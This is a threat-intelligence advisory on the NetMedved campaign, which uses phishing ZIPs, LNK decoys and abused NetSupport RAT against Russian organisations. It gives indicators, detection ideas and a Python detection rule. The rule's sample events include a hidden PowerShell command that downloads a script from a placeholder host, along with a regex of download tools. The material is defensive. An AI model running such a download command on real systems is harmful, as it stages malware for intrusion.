New Threat Actor: NetMedved

Date Discovered: Late November 2025
Primary Target: Russian Organizations (Construction, Agro-Industry, and other sectors)
Main Tool: NetSupport RAT

Threat Profile

Security researchers have identified a previously unknown threat actor dubbed NetMedved (likely translating to “NetBear”). This group has launched a targeted campaign against Russian companies, aiming to infiltrate corporate networks to conduct espionage or deploy further payloads.

Unlike “smash-and-grab” cybercriminals, NetMedved appears to focus on establishing long-term persistence within victim networks using legitimate, dual-use software to blend in with normal administrative traffic.

Tactics, Techniques, and Procedures (TTPs)

1. Initial Access: Targeted Phishing

The attack begins with spear-phishing emails sent to corporate employees.

  • Theme: The emails masquerade as legitimate business correspondence, typically “Purchase Requests,” “Orders,” or “Tender Documents.”
  • Attachment: The email includes a ZIP archive (e.g., Order_Details.zip or Purchase_Request.zip).

2. Execution: The LNK Decoy

  • Deception: Inside the ZIP archive is a malicious .LNK (Shortcut) file. The actor changes the icon of this shortcut to look like a standard PDF or Word document to trick the user.
  • Trigger: When the victim double-clicks the LNK file, it does not open a document. Instead, it executes a hidden PowerShell command.

3. Payload Delivery

  • Staging: The PowerShell script connects to a remote server controlled by the attacker to download the next stage of the payload.
  • Dropper: A loader/dropper script is executed, which retrieves the final malware payload.

4. Command & Control (C2): NetSupport RAT

  • Tool: The primary payload is NetSupport Manager, a legitimate remote administration tool widely used by IT support teams.
  • Abuse: NetMedved configures this legitimate tool to report back to its own Command & Control infrastructure rather than to the victim's IT support servers.
  • Persistence: The RAT is installed with a configuration that allows it to run silently in the background, granting the attacker full remote control over the infected machine (file transfer, screen capture, remote shell).
  • Evasion: Because NetSupport is a signed, legitimate application, it often bypasses standard antivirus detection that looks for known “malware” signatures.

Indicators of Compromise (IOCs)

File Artifacts

  • Malicious Files: Look for ZIP archives containing solitary .LNK files, especially in the Downloads or Temp folders.
  • LNK Target Paths: Shortcuts that point to powershell.exe or cmd.exe with arguments to download files from external URLs.
  • Payload Directory: Presence of NetSupport Manager files (e.g., client32.exe) in unusual directories such as:
    • %APPDATA%
    • %PROGRAMDATA%
    • C:\Users\Public\

Network Behaviors

  • Protocol: Unusual HTTP/HTTPS traffic associated with remote desktop tools.
  • Gateway: Connections to external IPs on ports often used by NetSupport (e.g., 443 or proprietary ports if configured) that do not match known corporate remote support infrastructure.

Targeting Scope

  • Geography: Russia.
  • Sectors: Construction, Agro-Industry, General Enterprise.

Detection Opportunities

  • Process Monitoring: Alert on powershell.exe spawned directly by explorer.exe (the user double-clicking a file) that then initiates an outbound network connection.
  • File Analysis: Scan for LNK files that have a “Document” icon (PDF/DOCX) but contain a command-line target.
  • Application Whitelisting: Audit the usage of NetSupport Manager (client32.exe). If your organization does not use this software, block it immediately.
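The process-monitoring and NetSupport-audit opportunities above can be turned into a small correlation rule. The following is an added example, not code from the advisory: it reads constructed Sysmon-style events (event id 1 = process creation, id 3 = network connection), links each connection back to its creating process, and flags an explorer.exe-spawned shell whose command line contains a download instruction, plus any client32.exe running from the directories the advisory lists. Field names, the hostname, the IP and the 60-second window are assumptions for the sample data.

```python
# Added example (not the advisory's code): correlate Sysmon-like events for the
# detection opportunities above. All event dicts below are constructed samples.
import re
from datetime import datetime, timedelta
# Directories the advisory names as unusual homes for client32.exe (lower-cased, with separators)
SUSPICIOUS_DIRS = ("\\appdata\\", "\\programdata\\", "c:\\users\\public\\")
# Command-line fragments showing the shell was started to fetch something remote
DOWNLOAD_RE = re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I)
SHELLS = ("\\powershell.exe", "\\cmd.exe")

def find_alerts(events, window_s=60):
    """Return alert strings. events: dicts with id 1 (ProcessCreate) or 3 (NetworkConnect)."""
    alerts, procs = [], {}          # procs: pid -> most recent ProcessCreate event
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["id"] == 1:
            procs[e["pid"]] = e
            image = e["image"].lower()
            # NetSupport client launched from a user-writable / unusual directory
            if image.endswith("\\client32.exe") and any(d in image for d in SUSPICIOUS_DIRS):
                alerts.append(f"netsupport-in-unusual-dir pid={e['pid']} path={e['image']}")
        elif e["id"] == 3:
            p = procs.get(e["pid"])
            if p is None:
                continue
            # explorer.exe -> shell with a download command -> network connection shortly after
            if (p["parent"].lower().endswith("\\explorer.exe")
                    and p["image"].lower().endswith(SHELLS)
                    and e["ts"] - p["ts"] <= timedelta(seconds=window_s)
                    and DOWNLOAD_RE.search(p["cmdline"])):
                alerts.append(f"explorer-spawned-shell-download pid={e['pid']} dst={e['dst']}")
    return alerts

T0 = datetime(2025, 11, 25, 9, 0, 0)   # assumed timestamp for the constructed sample
def pc(sec, pid, image, parent, cmdline):   # ProcessCreate helper
    return {"id": 1, "ts": T0 + timedelta(seconds=sec), "pid": pid, "image": image, "parent": parent, "cmdline": cmdline}
def nc(sec, pid, dst):                      # NetworkConnect helper
    return {"id": 3, "ts": T0 + timedelta(seconds=sec), "pid": pid, "dst": dst}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed sample; hostname and IP are placeholders
    pc(5, 5232, PS, EXPLORER, 'powershell.exe -w hidden -c "iwr http://staging.invalid/x -OutFile $env:TEMP\\x.ps1"'),
    nc(7, 5232, "203.0.113.10:443"),
    pc(20, 6004, r"C:\ProgramData\Updater\client32.exe", PS, "client32.exe"),
    pc(30, 7100, PS, EXPLORER, "powershell.exe"),   # benign: user opened a console from Explorer
    nc(31, 7100, "10.0.0.5:445"),                    # ...and touched a file share: no download, no alert
]
if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

In production the same logic runs over Sysmon or EDR telemetry; the benign third process shows why the command-line check matters for keeping the rule quiet on ordinary console use.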